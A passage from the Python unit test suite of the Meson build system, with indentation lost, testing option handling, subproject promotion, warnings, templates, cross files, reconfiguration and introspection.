testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main() {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
# The test uses mocking and thus requires that
# the current process is the one to run the Meson steps.
# If we are using an external test executable (most commonly
# in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc))
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['foo bar', 'one', 'two'])
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = r'{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': 'undefined'
}
]
}
self.assertDictEqual(res, expected)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
